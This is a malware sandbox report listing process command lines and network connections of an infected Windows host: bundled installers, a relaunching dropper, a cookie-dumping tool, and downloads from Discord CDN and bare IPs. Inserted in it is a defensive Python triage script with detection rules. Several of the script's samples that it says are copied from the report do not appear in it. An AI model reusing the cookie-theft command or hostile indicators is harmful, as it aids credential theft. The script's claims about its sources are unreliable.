C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 6044 -ip 6044
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1944
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3780 -ip 3780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3780 -s 272
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5680 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D728.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1d0,0x210,0x7fff07e9dec0,0x7fff07e9ded0,0x7fff07e9dee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=1840 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1608 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2464 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=2356 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2472 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=3248 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3308 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=1940 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=2480 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=2084 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=1940 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x184,0x188,0x18c,0x180,0x190,0x7ffef07d46f8,0x7ffef07d4708,0x7ffef07d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef07d46f8,0x7ffef07d4708,0x7ffef07d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
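Worked triage of the command lines above and of the Network table that follows. The Python below is an added example; it is not part of the sandbox report and not the sandbox vendor's code. Its sample command lines and table rows are constructed by copying a handful of entries from this report (the PowerShell line abridged, Esplorarne.exe.com repeated because the report shows it relaunched many times). The rule names, the category names, the list of external-IP-lookup services, the "abused hosting" suffixes and the choice to treat 2no.co as an IP-logging endpoint are this example's own assumptions, not labels taken from the report. The parser also repairs table rows whose Domain cell is empty so the protocol slid left into the Domain column, which is how the raw export renders direct-to-IP connections.

```python
import re
from collections import defaultdict

# --- Part 1: process command lines ---------------------------------------------------
# Constructed sample: entries copied from the report above (PowerShell line abridged,
# Esplorarne.exe.com repeated to mirror its many relaunches in the report).
SAMPLE_PROCESSES = [
    r'"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe /qn CAMPAIGN="654" & exit',
    r'C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i',
    r'C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i',
    r'C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i',
    r'"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654',
    r'"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D728.ps1 -retry_count 10"',
    r'C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt',
    r'"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install',
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --lang=en-US',
]

# Rule names and patterns are this example's own assumptions.
PROCESS_RULES = [
    # cmd.exe /k <payload in %TEMP%> & exit: one-shot launcher that leaves no console behind
    ("cmd_k_temp_launcher", re.compile(r'cmd\.exe"?\s+/k\s+\S*\\AppData\\Local\\Temp\\.*&\s*exit\s*$', re.I)),
    # double extension such as .exe.com dropped under %TEMP% (here a 7-Zip SFX extraction dir)
    ("double_extension_in_temp", re.compile(r'\\AppData\\Local\\Temp\\.*\.(?:exe|scr|bat)\.(?:com|exe|scr)\b', re.I)),
    # silent MSI install carrying an affiliate/campaign ID (pay-per-install bundling)
    ("silent_msi_with_campaign", re.compile(r'msiexec\.exe"?\s+/i\s+.*?/qn\b.*\bCAMPAIGN=', re.I)),
    # PowerShell executing a script that was dropped in %TEMP%
    ("powershell_runs_temp_script", re.compile(r'powershell\.exe"?.*-Command\s+"?[A-Z]:\\.*\\Temp\\[^"\s]+\.ps1', re.I)),
    # save-to-file switches used by NirSoft command-line tools (/stext, /scomma, /shtml, /sxml, /scookiestxt)
    ("nirsoft_export_switch", re.compile(r'\s/s(?:cookiestxt|text|comma|html|xml)\b', re.I)),
    # "<bundled>.exe install": a dropped program registering itself as a Windows service
    ("service_self_install", re.compile(r'\.exe"?\s+install\s*$', re.I)),
]


def triage_processes(cmdlines):
    """Return [(cmdline, [rule names])] for every command line that trips at least one rule."""
    findings = []
    for line in cmdlines:
        hits = [name for name, rx in PROCESS_RULES if rx.search(line)]
        if hits:
            findings.append((line, hits))
    return findings


# --- Part 2: network table rows ------------------------------------------------------
# Constructed sample: rows copied from the Network table below, including two of the
# malformed rows where the Domain cell is missing and "tcp" sits in the Domain column.
SAMPLE_NETWORK = """
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 20.190.160.71:443 | tcp | |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 185.186.142.245:22850 | tcp | |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 8.8.8.8:53 | a.goatagame.com | udp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 52.219.160.54:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
""".strip().splitlines()

# Allow-lists below are assumptions for this example, not classifications from the report.
IP_LOOKUP_SERVICES = {"ipinfo.io", "api.ip.sb", "ip-api.com", "api.db-ip.com",
                      "ipqualityscore.com", "proxycheck.io", "2no.co"}
ABUSED_HOSTING = ("cdn.discordapp.com", ".amazonaws.com", "s3.tebi.io", ".cloudfront.net",
                  "script.google.com", "script.googleusercontent.com")
OS_NOISE = (".microsoft.com",)


def parse_network_row(line):
    """Parse one pipe-table row; repairs rows whose Domain cell is missing and Proto slid left."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) != 4:
        return None
    country, dest, domain, proto = cells
    if domain.lower() in ("tcp", "udp") and proto == "":
        domain, proto = "", domain          # shifted columns: no domain was resolved
    host, _, port = dest.rpartition(":")
    if not port.isdigit():                  # header or separator row
        return None
    return {"country": country, "host": host, "port": int(port),
            "domain": domain, "proto": proto.lower()}


def classify_connection(row):
    d, host, port = row["domain"], row["host"], row["port"]
    if row["proto"] == "udp" and port == 53:
        return "dns_query"
    if d.endswith(OS_NOISE):
        return "os_noise"
    if d in IP_LOOKUP_SERVICES:
        return "external_ip_lookup"
    if d.endswith(ABUSED_HOSTING):
        return "abused_hosting"
    if d == "" or d == host:                # connection straight to an IP, no hostname
        return "direct_ip_web" if port in (80, 443) else "direct_ip_nonstd_port"
    return "unclassified_domain"


def summarize_network(lines):
    """Bucket every parsable row; returns {category: sorted unique labels}."""
    buckets = defaultdict(set)
    for line in lines:
        row = parse_network_row(line)
        if row is None:
            continue
        named = row["domain"] and row["domain"] != row["host"]
        label = row["domain"] if named else f'{row["host"]}:{row["port"]}'
        buckets[classify_connection(row)].add(label)
    return {k: sorted(v) for k, v in buckets.items()}


def network_iocs(lines):
    """Blocklist candidates: unknown domains plus every direct-to-IP socket."""
    s = summarize_network(lines)
    keep = ("unclassified_domain", "direct_ip_nonstd_port", "direct_ip_web")
    return sorted({x for k in keep for x in s.get(k, [])})


if __name__ == "__main__":
    for line, hits in triage_processes(SAMPLE_PROCESSES):
        print(", ".join(hits), "<-", line[:70])
    for cat, items in summarize_network(SAMPLE_NETWORK).items():
        print(cat, items)
```

The direct-to-IP sockets on ports such as 22850, 25802 and 26336 with no resolved domain are the rows to pull into blocklists first; the external-IP-lookup and Microsoft telemetry buckets are the ones to drop from an IOC list so they do not generate false positives on every host.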
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 52.247.37.26:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | settings-win.data.microsoft.com | udp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 20.190.160.71:443 | | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | | tcp |
| N/A | 95.101.206.92:80 | go.microsoft.com | tcp |
| N/A | 52.247.37.26:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.166:443 | api.db-ip.com | tcp |
| N/A | 104.26.4.15:443 | api.db-ip.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.160.54:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | a.goatagame.com | udp |
